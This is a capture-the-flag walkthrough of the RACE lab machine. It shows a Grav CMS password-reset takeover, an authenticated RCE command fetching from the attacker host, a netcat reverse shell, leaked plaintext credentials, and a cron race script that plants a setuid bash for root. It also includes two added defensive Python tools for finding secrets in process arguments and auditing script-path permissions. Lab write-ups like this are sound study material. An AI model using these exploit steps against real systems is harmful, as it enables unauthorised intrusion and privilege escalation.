Here are my notes on the RACE box from Vulnlab, which has since been deployed to HackTheBox.
RACE: 10.10.93.82
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 62b01ec5e8815c9439ed377e21cfb1a8 (ECDSA)
|_ 256 37a3d3cd35dcccd8db3cc34dad2229a9 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
index.html [Status: 200, Size: 163, Words: 25, Lines: 9, Duration: 114ms]
server-status [Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 144ms]
phpsysinfo [Status: 401, Size: 458, Words: 42, Lines: 15, Duration: 132ms]
index.html:
Grav with by Trilby Media.
phpsysinfo:
admin:admin - WORKS !
/usr/sbin/cron -f -P:
/usr/bin/curl --insecure --connect-timeout 60 -u backup:Wedobackupswithsecur3password5.Noonecanhackus! -T /var/www/html/racers/backup/ sftp://offsite-backup.race.vl/backups/
GravCMS Notes:
https://pr0m0ly.notion.site/Race-a90536f909be45b780b42d1dd4fae551
/racers/admin - Interesting.
backup:Wedobackupswithsecur3password5.Noonecanhackus! - WORKS !
#FROM phpsysinfo.
Generate Backup and download it.
CHANGELOG.md:
Grav CMS - # v1.7.43
┌──(root㉿kali)-[/home/…/10.10.93.82/Grav/user/accounts]
└─# pwd
/home/kali/VL/RACE/10.10.93.82/Grav/user/accounts
┌──(root㉿kali)-[/home/…/10.10.93.82/Grav/user/accounts]
└─# ls
admin.yaml backup.yaml patrick.yaml
┌──(root㉿kali)-[/home/…/10.10.93.82/Grav/user/accounts]
└─# tree -r .
.
├── patrick.yaml
├── backup.yaml
└── admin.yaml
1 directory, 3 files
cat *.yaml
[SNIP]
email: patrick@race.vl
fullname: 'Patrick P. Rick'
language: en
content_editor: default
twofa_enabled: false
twofa_secret: LW35AG7V4U4NLOBVU5P6NG35GP5YWJKT
avatar: { }
hashed_password: $2y$10$TWyPZQDqMZJJ/0pLdWUbY.TxVKVMHP3LzfUTo3BYWFRID7uXaoXcC
reset: '553e7719d2674ae2bfb29eb0aaa806d0::1701718773'
access:
  site:
    login: true
  admin:
    login: true
    super: false
    cache: false
    configuration:
      system: true
      site: true
      media: false
      security: false
      info: false
      pages: false
      users: false
    pages: true
    maintenance: true
    themes: true
http://10.10.69.41/racers/forgot_password
However, that reset token had already expired, so request a new reset for patrick@race.vl through the forgot-password form as usual, then download the backup again to read the fresh token.
We have a reset token: 3a5635064ec46ef002814d4818c0e3ea
With this token we can reset patrick's password and then log in as patrick.
http://10.10.117.208/racers/reset_password/task:login.reset/token:3a5635064ec46ef002814d4818c0e3ea/user:patrick@race.vl/nonce:7dd69d42bfd1ac89301c8e5c4827f85d
Page source of /racers/reset_password, matching the URL above:
forgot-form-nonce = 7dd69d42bfd1ac89301c8e5c4827f85d
Wedobackupswithsecur3password5.Noonecanhackus!
Password has been reset !
patrick@race.vl: Wedobackupswithsecur3password5.Noonecanhackus!
Log in to /admin with patrick's credentials (the password we just set) and IT WORKS !
https://github.com/gunzf0x/Grav-CMS-RCE-Authenticated
python3 Grav_CMS_RCE.py -t http://10.10.117.208/racers/admin -u 'patrick@race.vl' -p 'Wedobackupswithsecur3password5.Noonecanhackus!' -x 'wget http://10.8.0.71'
[*] Attacking 'http://10.10.117.208/racers/admin:80'...
[*] Uploading payload...
[*] Executing payload...
[*] Payload deleted. Actually, what payload? Nothing happened here ;)
#Blind-RCE WORKS !
http://10.10.117.208/racers/shell.php
#WEB-SHELL !
Convert it to a user reverse-shell as usual.
sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.117.208] 59298
www-data@race:/var/www/html/racers$ whoami
whoami
www-data
www-data@race:/var/www/html/racers$ hostname
hostname
race
www-data@race:/var/www/html/racers$
USER-SHELL !
PRIV ESC:
www-data -> max:
www-data@race:/home/max/race-scripts$ pwd
pwd
/home/max/race-scripts
www-data@race:/home/max/race-scripts$ ls -lah
ls -lah
total 16K
drwxrwsr-x 3 root racers 4.0K Dec 9 2023 .
drwxr-xr-x 6 root root 4.0K Dec 4 2023 ..
drwxr-sr-x 2 root racers 4.0K Dec 9 2023 backup
-rwxr-xr-x 1 root root 361 Dec 5 2023 offsite-backup.sh
www-data@race:/home/max/race-scripts$ cat offsite-backup.sh
cat offsite-backup.sh
#!/usr/bin/bash
OFFSITE_HOST="offsite-backup.race.vl"
SOURCE_DIR="/var/www/html/racers/backup/"
# Disabled USER/PASS for security reasons. Will be provided via environment from cron.
# OFFSITE_USER="max"
# OFFSITE_PASS="ruxai0GaemaS1Rah"
/usr/bin/curl --insecure --connect-timeout 60 -u $OFFSITE_USER:$OFFSITE_PASS -T $SOURCE_DIR sftp://$OFFSITE_HOST/backups/
max:ruxai0GaemaS1Rah
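Both credential leaks on this box have the same root cause: the secret is part of a process's argv. phpsysinfo showed the cron curl line with -u backup:... expanded, and the "fix" in offsite-backup.sh (move user/pass into the environment) does not change that, because the shell expands $OFFSITE_USER:$OFFSITE_PASS into argv before curl starts, where ps, /proc and phpsysinfo can all read it. The scanner below is an added example, not part of these notes or of the box; it flags command lines carrying secrets (curl -u/--user, user:pass@ inside a URL, --password) and redacts them for reporting. The sample lines are constructed, with made-up passwords, and the third one shows the safe form: curl's --netrc-file keeps the credential in a mode-600 file and off the command line (curl -K config works the same way).

```python
import os
import re
from dataclasses import dataclass
from typing import List, Optional

# Each pattern names one way a secret ends up in argv. The secret is captured only
# so its length can be reported and the line redacted; it is never printed.
PATTERNS = [
    ("curl -u/--user",
     re.compile(r"(?:^|\s)(?:-u|--user)(?:\s+|=)(?P<user>[^\s:]+):(?P<secret>\S+)")),
    ("URL userinfo",
     re.compile(r"[A-Za-z][A-Za-z0-9+.-]*://(?P<user>[^\s:/@]+):(?P<secret>[^\s@]+)@")),
    ("--password",
     re.compile(r"(?:^|\s)--password(?:\s+|=)(?P<secret>\S+)")),
]


@dataclass
class Finding:
    kind: str
    user: Optional[str]
    secret_length: int
    redacted: str       # the command line with every detected secret masked


def scan_cmdline(cmdline: str) -> List[Finding]:
    """Return one Finding per secret found in a single command line."""
    hits = []
    for kind, pat in PATTERNS:
        for m in pat.finditer(cmdline):
            secret = m.group("secret")
            # "$VAR" means we are reading an unexpanded script, not live argv;
            # the shell expands it before exec, so the live process is what to scan.
            if secret.startswith("$"):
                continue
            hits.append((kind, m.groupdict().get("user"), secret))
    redacted = cmdline
    for _, _, secret in hits:
        redacted = redacted.replace(secret, "<REDACTED>")
    return [Finding(kind, user, len(secret), redacted) for kind, user, secret in hits]


def scan_lines(lines: List[str]) -> dict:
    """Map line index -> findings, for the lines that have any."""
    result = {}
    for i, line in enumerate(lines):
        found = scan_cmdline(line)
        if found:
            result[i] = found
    return result


def scan_proc() -> List[Finding]:
    """Scan every readable /proc/<pid>/cmdline on a live Linux host.
    This is the same view phpsysinfo, or any local user running ps, gets."""
    findings = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/cmdline", "rb") as fh:
                argv = fh.read().split(b"\0")
        except OSError:
            continue
        findings.extend(scan_cmdline(" ".join(a.decode(errors="replace") for a in argv if a)))
    return findings


# Constructed sample command lines (not taken from the box). The first mirrors the
# shape of the cron job phpsysinfo exposed, with a made-up password.
SAMPLE_CMDLINES = [
    "/usr/bin/curl --insecure --connect-timeout 60 -u backup:S3cretExample! "
    "-T /var/www/html/racers/backup/ sftp://offsite-backup.race.vl/backups/",
    "/usr/bin/wget https://svc:hunter2@internal.example/report.csv",
    # Safe form: the credential lives in a mode-600 netrc file, nothing is in argv.
    "/usr/bin/curl --netrc-file /etc/backup.netrc -T /srv/backup/ sftp://offsite-backup.race.vl/backups/",
]

if __name__ == "__main__":
    for idx, findings in scan_lines(SAMPLE_CMDLINES).items():
        for f in findings:
            print(f"line {idx}: {f.kind} user={f.user} secret_len={f.secret_length}")
            print("   ", f.redacted)
```

scan_proc() is the part to run on the host itself; on this box it would have reported the cron curl job from an unprivileged shell, which is the point: hiding the credential from the script file is not enough when the process list is readable by every local user and by a web-facing status page.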
max@race:~$ whoami
max
max@race:~$ hostname
race
max SHELL !
max@race:~$ whoami
max
max@race:~$ hostname
race
max@race:~$ cat user.txt
VL{REDIRECTED}
USER.TXT: VL{REDIRECTED}
max -> root:
Looking back at phpsysinfo again:
/usr/bin/CRON -f -P:
/bin/sh -c /usr/local/bin/secure-cron-runner.sh >/dev/null 2>/dev/null
/usr/bin/bash /usr/local/bin/secure-cron-runner.sh
/usr/bin/bash /usr/local/share/race-scripts/offsite-backup.sh
max@race:~$ ls -lah
total 36K
drwxr-xr-x 5 max max 4.0K Dec 9 2023 .
drwxr-xr-x 4 root root 4.0K Dec 3 2023 ..
lrwxrwxrwx 1 root root 9 Dec 3 2023 .bash_history -> /dev/null
-rw-r--r-- 1 max max 220 Jan 6 2022 .bash_logout
-rw-r--r-- 1 max max 3.7K Jan 6 2022 .bashrc
drwxrwxr-x 2 max max 4.0K Dec 4 2023 bin
drwx------ 2 max max 4.0K Dec 3 2023 .cache
drwxrwxr-x 3 max max 4.0K Dec 9 2023 .local
-rw-r--r-- 1 max max 807 Jan 6 2022 .profile
lrwxrwxrwx 1 max max 29 Dec 9 2023 race-scripts -> /usr/local/share/race-scripts
-rw------- 1 max max 37 Dec 9 2023 user.txt
max@race:~$ cd race-scripts
max@race:~/race-scripts$ ls
backup offsite-backup.sh
max@race:~/race-scripts$ ls -lah
total 16K
drwxrwsr-x 3 root racers 4.0K Dec 9 2023 .
drwxr-xr-x 6 root root 4.0K Dec 4 2023 ..
drwxr-sr-x 2 root racers 4.0K Dec 9 2023 backup
-rwxr-xr-x 1 root root 361 Dec 5 2023 offsite-backup.sh
max@race:~/race-scripts$ echo "chmod u+s /bin/bash" > offsite-backup.sh
-bash: offsite-backup.sh: Permission denied
max@race:~/race-scripts$ rm offsite-backup.sh
rm: remove write-protected regular file 'offsite-backup.sh'? y
max@race:~/race-scripts$ ls
backup
max@race:~/race-scripts$ echo "chmod u+s /bin/bash" > offsite-backup.sh
max@race:~/race-scripts$ chmod +x offsite-backup.sh
max@race:~/race-scripts$ cat offsite-backup.sh
chmod u+s /bin/bash
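What the listing above shows is the actual weakness: offsite-backup.sh itself is root:root 755 and cannot be edited, but its directory /usr/local/share/race-scripts is drwxrwsr-x root:racers, so any member of racers can rm the root-owned file and recreate it, and the setgid bit even hands the new file the racers group. A cron job is only as safe as every path component above its script. The audit below is an added example, not part of these notes or of the box: it takes an ls -l style chain (directory by directory, root first), parses the permission strings, and reports any component a non-root user could write, treating the sticky bit as the one mitigation for directories. The race-scripts entries, its parent and the script come from the ls -lah output on this page; the three components above them (/, /usr, /usr/local) are assumed to be Ubuntu defaults. collect_entries() builds the same chain from a live host, and the check should be run over every script in the cron chain, secure-cron-runner.sh included.

```python
import os
import stat
from dataclasses import dataclass
from typing import List


@dataclass
class Entry:
    path: str
    perms: str   # ls -l style permission string, e.g. "drwxrwsr-x"
    owner: str
    group: str


@dataclass
class Issue:
    path: str
    problem: str


def parse_perms(perms: str) -> int:
    """Convert an ls -l permission string into POSIX mode bits (type, rwx, setuid/setgid/sticky)."""
    if len(perms) != 10:
        raise ValueError(f"bad permission string: {perms!r}")
    mode = {"d": stat.S_IFDIR, "-": stat.S_IFREG, "l": stat.S_IFLNK}.get(perms[0], 0)
    bits = [stat.S_IRUSR, stat.S_IWUSR, stat.S_IXUSR,
            stat.S_IRGRP, stat.S_IWGRP, stat.S_IXGRP,
            stat.S_IROTH, stat.S_IWOTH, stat.S_IXOTH]
    for i, ch in enumerate(perms[1:]):
        if ch in "rwxst":          # lower-case s/t mean the execute bit is set as well
            mode |= bits[i]
        if ch in "sS":
            mode |= stat.S_ISUID if i == 2 else stat.S_ISGID
        elif ch in "tT":
            mode |= stat.S_ISVTX
    return mode


def audit_components(entries: List[Entry]) -> List[Issue]:
    """entries = the cron target plus every directory above it, root first.
    A writable parent directory is as bad as a writable script: a group member can
    delete the root-owned file and recreate it. The sticky bit only protects entries
    owned by someone else, so it is counted as a mitigation for directories."""
    issues = []
    for e in entries:
        mode = parse_perms(e.perms)
        is_dir = stat.S_ISDIR(mode)
        sticky_dir = is_dir and bool(mode & stat.S_ISVTX)
        if e.owner != "root":
            issues.append(Issue(e.path, f"owned by non-root user '{e.owner}'"))
        if mode & stat.S_IWOTH and not sticky_dir:
            issues.append(Issue(e.path, "world-writable"))
        if mode & stat.S_IWGRP and e.group != "root" and not sticky_dir:
            how = "members can delete and recreate entries" if is_dir else "members can edit the file"
            issues.append(Issue(e.path, f"writable by group '{e.group}' ({how})"))
        if is_dir and mode & stat.S_ISGID and mode & (stat.S_IWGRP | stat.S_IWOTH):
            issues.append(Issue(e.path, f"setgid directory: new files inherit group '{e.group}'"))
    return issues


def collect_entries(path: str) -> List[Entry]:
    """Build the Entry chain for a real path on a live Unix host."""
    import pwd, grp
    chain, cur = [], os.path.abspath(path)
    while True:
        chain.append(cur)
        parent = os.path.dirname(cur)
        if parent == cur:
            break
        cur = parent
    entries = []
    for p in reversed(chain):
        st = os.lstat(p)
        try:
            owner, group = pwd.getpwuid(st.st_uid).pw_name, grp.getgrgid(st.st_gid).gr_name
        except KeyError:
            owner, group = str(st.st_uid), str(st.st_gid)
        entries.append(Entry(p, stat.filemode(st.st_mode), owner, group))
    return entries


# Chain as seen on the box: race-scripts, its parent ("..") and the script come from the
# ls -lah output; the three components above them are assumed Ubuntu defaults.
RACE_CHAIN = [
    Entry("/", "drwxr-xr-x", "root", "root"),
    Entry("/usr", "drwxr-xr-x", "root", "root"),
    Entry("/usr/local", "drwxr-xr-x", "root", "root"),
    Entry("/usr/local/share", "drwxr-xr-x", "root", "root"),
    Entry("/usr/local/share/race-scripts", "drwxrwsr-x", "root", "racers"),
    Entry("/usr/local/share/race-scripts/offsite-backup.sh", "-rwxr-xr-x", "root", "root"),
]
# Same chain with the directory fixed: root-owned, no group write, no setgid.
HARDENED_CHAIN = [Entry(e.path, "drwxr-xr-x" if e.perms[0] == "d" else e.perms, "root", "root")
                  for e in RACE_CHAIN]

if __name__ == "__main__":
    for issue in audit_components(RACE_CHAIN):
        print(f"{issue.path}: {issue.problem}")
```

On the box's chain the only findings are the two on /usr/local/share/race-scripts (group-writable by racers, setgid), which is exactly where the rm-and-recreate above succeeded; with the directory changed to root:root 755 the audit comes back empty.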
cron bash script exploit:
#Useful for CRON PRIV ESC.
exploit.sh:
#!/bin/bash
# Remember the PID of the CRON worker that is already running, so a freshly
# spawned one (the job firing) can be told apart from it.
current_pid=$(ps aux | grep CRON | grep -v grep | awk '{print $2}')
echo "Current pid is $current_pid"
# Busy-loop until a CRON process other than the remembered one shows up,
# then append the two lines to the cron-run script.
while true; do
    if ps aux | grep 'CRON' | grep -v $current_pid | grep -v 'grep'; then
        echo "cp /bin/bash /tmp/pr0" >> /usr/local/share/race-scripts/offsite-backup.sh
        echo "chmod u+s /tmp/pr0" >> /usr/local/share/race-scripts/offsite-backup.sh
        echo "DONE!"
        break
    fi
done
max@race:~/race-scripts$ rm offsite-backup.sh
rm: remove write-protected regular file 'offsite-backup.sh'? y
max@race:~/race-scripts$ cp backup/offsite-backup.sh .
max@race:~/race-scripts$ ls
backup offsite-backup.sh
max@race:~/race-scripts$ chmod +x offsite-backup.sh
max@race:~/race-scripts$ bash /tmp/exploit.sh
Current pid is 1083
^C
max@race:~/race-scripts$ ls
backup offsite-backup.sh
max@race:~/race-scripts$ ls -lah
total 16K
drwxrwsr-x 3 root racers 4.0K Dec 7 20:38 .
drwxr-xr-x 6 root root 4.0K Dec 4 2023 ..
drwxr-sr-x 2 root racers 4.0K Dec 9 2023 backup
-rwxr-xr-x 1 max racers 361 Dec 7 20:38 offsite-backup.sh
max@race:~/race-scripts$ bash /tmp/exploit.sh
Current pid is 21044
max@race:~/race-scripts$ bash /tmp/exploit.sh
Current pid is 21044
root 42435 0.0 0.2 10336 4112 ? S 20:41 0:00 /usr/sbin/CRON -f -P
DONE!
max@race:~/race-scripts$ ls -lah /tmp | grep "pr0"
-rwsr-xr-x 1 root root 1.4M Dec 7 20:41 pr0
max@race:~/race-scripts$ /tmp/pr0 -p
pr0-5.1# whoami
root
pr0-5.1# id
uid=1001(max) gid=1001(max) euid=0(root) groups=1001(max),1002(racers)
pr0-5.1# hostname
race
ROOT-SHELL !
pr0-5.1# whoami
root
pr0-5.1# hostname
race
pr0-5.1# pwd
/root
pr0-5.1# ls
conf root.txt snap
pr0-5.1# cat root.txt
VL{REDIRECTED}
ROOT.TXT: VL{REDIRECTED}
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel